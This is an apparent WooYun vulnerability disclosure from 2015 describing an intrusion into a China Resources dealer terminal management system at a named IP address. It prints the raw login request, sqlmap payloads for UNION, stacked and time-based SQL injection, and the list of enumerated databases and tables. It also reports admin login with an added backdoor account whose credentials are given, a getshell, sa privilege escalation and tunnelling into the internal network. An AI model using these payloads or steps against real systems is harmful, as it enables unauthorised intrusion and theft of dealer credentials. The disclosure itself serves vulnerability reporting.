当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0131389

漏洞标题:华润某终端管理系统getshell已入内网(影响整个省经销商)

相关厂商:华润饮料(控股)有限公司

漏洞作者: jianFen

提交时间:2015-08-03 19:57

修复时间:2015-09-18 18:00

公开时间:2015-09-18 18:00

漏洞类型:成功的入侵事件

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-03: 细节已通知厂商并且等待厂商处理中
2015-08-04: 厂商已经确认,细节仅向厂商公开
2015-08-14: 细节向核心白帽子及相关领域专家公开
2015-08-24: 细节向普通白帽子公开
2015-09-03: 细节向实习白帽子公开
2015-09-18: 细节向公众公开

简要描述:

- -

详细说明:

http://221.237.153.40:8081/
和华润控股合作的
首先后台存在注入

POST /Login.aspx HTTP/1.1
Host: 221.237.153.40:8081
Proxy-Connection: keep-alive
Content-Length: 217
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://221.237.153.40:8081
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded
Referer: http://221.237.153.40:8081/Login.aspx
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh;q=0.8
__VIEWSTATE=%2FwEPDwUJMzQ3MDM0NTMxZGRbJxiESdy4BDef6qQAQi%2FtiZA6rA%3D%3D&__EVENTVALIDATION=%2FwEWBALMvPzODgLB2tiHDgKd%2B7qdDgKM54rGBswXH3t03%2BJD6BSESsrbFW2r6QCY&txtUser=11111&txtPwd=1111111&Button1=%E7%99%BB%E5%BD%95


sqlmap identified the following injection points with a total of 86 HTTP(s) requests:
---
Place: POST
Parameter: txtUser
Type: UNION query
Title: Generic UNION query (NULL) - 15 columns
Payload: __VIEWSTATE=/wEPDwUJMzQ3MDM0NTMxZGRbJxiESdy4BDef6qQAQi/tiZA6rA==&__EVENTVALIDATION=/wEWBALMvPzODgLB2tiHDgKd+7qdDgKM54rGBswXH3t03+JD6BSESsrbFW2r6QCY&txtUser=11111' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, CHAR(58)+CHAR(98)+CHAR(106)+CHAR(111)+CHAR(58)+CHAR(99)+CHAR(116)+CHAR(71)+CHAR(66)+CHAR(99)+CHAR(82)+CHAR(97)+CHAR(72)+CHAR(78)+CHAR(98)+CHAR(58)+CHAR(101)+CHAR(112)+CHAR(106)+CHAR(58), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- &txtPwd=1111111&Button1=登录
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: __VIEWSTATE=/wEPDwUJMzQ3MDM0NTMxZGRbJxiESdy4BDef6qQAQi/tiZA6rA==&__EVENTVALIDATION=/wEWBALMvPzODgLB2tiHDgKd+7qdDgKM54rGBswXH3t03+JD6BSESsrbFW2r6QCY&txtUser=11111'; WAITFOR DELAY '0:0:5';--&txtPwd=1111111&Button1=登录
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: __VIEWSTATE=/wEPDwUJMzQ3MDM0NTMxZGRbJxiESdy4BDef6qQAQi/tiZA6rA==&__EVENTVALIDATION=/wEWBALMvPzODgLB2tiHDgKd+7qdDgKM54rGBswXH3t03+JD6BSESsrbFW2r6QCY&txtUser=11111' WAITFOR DELAY '0:0:5'--&txtPwd=1111111&Button1=登录
---
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: txtUser
Type: UNION query
Title: Generic UNION query (NULL) - 15 columns
Payload: __VIEWSTATE=/wEPDwUJMzQ3MDM0NTMxZGRbJxiESdy4BDef6qQAQi/tiZA6rA==&__EVENTVALIDATION=/wEWBALMvPzODgLB2tiHDgKd+7qdDgKM54rGBswXH3t03+JD6BSESsrbFW2r6QCY&txtUser=11111' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, CHAR(58)+CHAR(98)+CHAR(106)+CHAR(111)+CHAR(58)+CHAR(99)+CHAR(116)+CHAR(71)+CHAR(66)+CHAR(99)+CHAR(82)+CHAR(97)+CHAR(72)+CHAR(78)+CHAR(98)+CHAR(58)+CHAR(101)+CHAR(112)+CHAR(106)+CHAR(58), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- &txtPwd=1111111&Button1=登录
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: __VIEWSTATE=/wEPDwUJMzQ3MDM0NTMxZGRbJxiESdy4BDef6qQAQi/tiZA6rA==&__EVENTVALIDATION=/wEWBALMvPzODgLB2tiHDgKd+7qdDgKM54rGBswXH3t03+JD6BSESsrbFW2r6QCY&txtUser=11111'; WAITFOR DELAY '0:0:5';--&txtPwd=1111111&Button1=登录
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: __VIEWSTATE=/wEPDwUJMzQ3MDM0NTMxZGRbJxiESdy4BDef6qQAQi/tiZA6rA==&__EVENTVALIDATION=/wEWBALMvPzODgLB2tiHDgKd+7qdDgKM54rGBswXH3t03+JD6BSESsrbFW2r6QCY&txtUser=11111' WAITFOR DELAY '0:0:5'--&txtPwd=1111111&Button1=登录
---
available databases [11]:
[*] ceshi
[*] master
[*] model
[*] msdb
[*] qdxt_xl
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] xuehua_2014
[*] xuehua_2015
[*] ZDFY_275
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: txtUser
Type: UNION query
Title: Generic UNION query (NULL) - 15 columns
Payload: __VIEWSTATE=/wEPDwUJMzQ3MDM0NTMxZGRbJxiESdy4BDef6qQAQi/tiZA6rA==&__EVENTVALIDATION=/wEWBALMvPzODgLB2tiHDgKd+7qdDgKM54rGBswXH3t03+JD6BSESsrbFW2r6QCY&txtUser=11111' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, CHAR(58)+CHAR(98)+CHAR(106)+CHAR(111)+CHAR(58)+CHAR(99)+CHAR(116)+CHAR(71)+CHAR(66)+CHAR(99)+CHAR(82)+CHAR(97)+CHAR(72)+CHAR(78)+CHAR(98)+CHAR(58)+CHAR(101)+CHAR(112)+CHAR(106)+CHAR(58), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- &txtPwd=1111111&Button1=登录
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: __VIEWSTATE=/wEPDwUJMzQ3MDM0NTMxZGRbJxiESdy4BDef6qQAQi/tiZA6rA==&__EVENTVALIDATION=/wEWBALMvPzODgLB2tiHDgKd+7qdDgKM54rGBswXH3t03+JD6BSESsrbFW2r6QCY&txtUser=11111'; WAITFOR DELAY '0:0:5';--&txtPwd=1111111&Button1=登录
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: __VIEWSTATE=/wEPDwUJMzQ3MDM0NTMxZGRbJxiESdy4BDef6qQAQi/tiZA6rA==&__EVENTVALIDATION=/wEWBALMvPzODgLB2tiHDgKd+7qdDgKM54rGBswXH3t03+JD6BSESsrbFW2r6QCY&txtUser=11111' WAITFOR DELAY '0:0:5'--&txtPwd=1111111&Button1=登录
---
Database: xuehua_2015
[95 tables]
+-------------------------+
| dbo.ERP_user |
| dbo.LC |
| dbo.LCCD |
| dbo.LCID |
| dbo.LC_detail |
| dbo.LC_roll |
| dbo.Lxsb_cpmx |
| dbo.Lxsb_fymx |
| dbo.Lxsb_gdfy |
| dbo.Lxsb_sxyjmx |
| dbo.Table_1 |
| dbo.View_Jtchongxiao_ls |
| dbo.View_Sum_jhfy |
| dbo.View_Sum_jhfy_new |
| dbo.View_Sum_sjfy |
| dbo.View_Sum_sjxl |
| dbo.View_Sum_sxyj |
| dbo.View_Sum_sxyj_yd |
| dbo.View_Sum_ydxl |
| dbo.View_XL_Dc |
| dbo.View_cwsj |
| dbo.View_fy |
| dbo.View_fy_jxs |
| dbo.View_fy_zfy |
| dbo.View_fyjt |
| dbo.View_hxlc |
| dbo.View_hxpg |
| dbo.View_jtcx |
| dbo.View_lx_qr_db |
| dbo.View_lxsb_jd |
| dbo.View_sp |
| dbo.View_sxyj |
| dbo.View_sxyj_new |
| dbo.View_tzmx |
| dbo.View_tzmx_new |
| dbo.View_tzmx_newxybh |
| dbo.View_xl |
| dbo.View_xl_new |
| dbo.View_xsjk |
| dbo.View_xsjk_hj |
| dbo.View_xsjk_init |
| dbo.View_ydsb |
| dbo.XH_bz |
| dbo.XH_cp |
| dbo.XH_cpdc |
| dbo.XH_dxy_qsy |
| dbo.XH_fygs |
| dbo.XH_fygs_ewcp |
| dbo.XH_fygs_ewsxyj |
| dbo.XH_fygs_fybd |
| dbo.XH_fygs_gdsxyj |
| dbo.XH_fygs_sxyj |
| dbo.XH_fygsmx |
| dbo.XH_fyhx |
| dbo.XH_fykm |
| dbo.XH_fysp |
| dbo.XH_fytk |
| dbo.XH_gc |
| dbo.XH_gdcb |
| dbo.XH_gdfy |
| dbo.XH_gdfylb |
| dbo.XH_glqy |
| dbo.XH_gtfy |
| dbo.XH_hxpg |
| dbo.XH_jgtx |
| dbo.XH_jgtx_ls |
| dbo.XH_jhfy |
| dbo.XH_jtls |
| dbo.XH_lxsb |
| dbo.XH_lxsbsh |
| dbo.XH_mk |
| dbo.XH_pfs |
| dbo.XH_qyzt |
| dbo.XH_sjfy |
| dbo.XH_sjxl |
| dbo.XH_sxyj |
| dbo.XH_sxyj_yd |
| dbo.XH_trxs |
| dbo.XH_user |
| dbo.XH_user_dq |
| dbo.XH_user_qx |
| dbo.XH_user_qy |
| dbo.XH_xsdq |
| dbo.XH_xsjk |
| dbo.XH_xsjk_kj |
| dbo.XH_xyyq |
| dbo.XH_xzqy |
| dbo.XH_ydxl |
| dbo.XH_yyt |
| dbo.XH_zd |
| dbo.XH_zdgk |
| dbo.XH_zdlx |
| dbo.XH_zm |
| dbo.dljl |
| dbo.qdxtidtzmx |
+-------------------------+
dbo.XH_user 表里有几千个经销商和包括admin的密码 我登入admin添加了一个账号作为测试
为了方便审核 jianfen/jianfen97


后台功能

5.PNG


3.PNG


4.PNG


getshell :

8.PNG


web.config
sa权限提权成功

10.PNG


reduh转发入内网

11.PNG

漏洞证明:

11.PNG

修复方案:

过滤注入

版权声明:转载请注明来源 jianFen@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-08-04 17:59

厂商回复:

感谢提交

最新状态:

暂无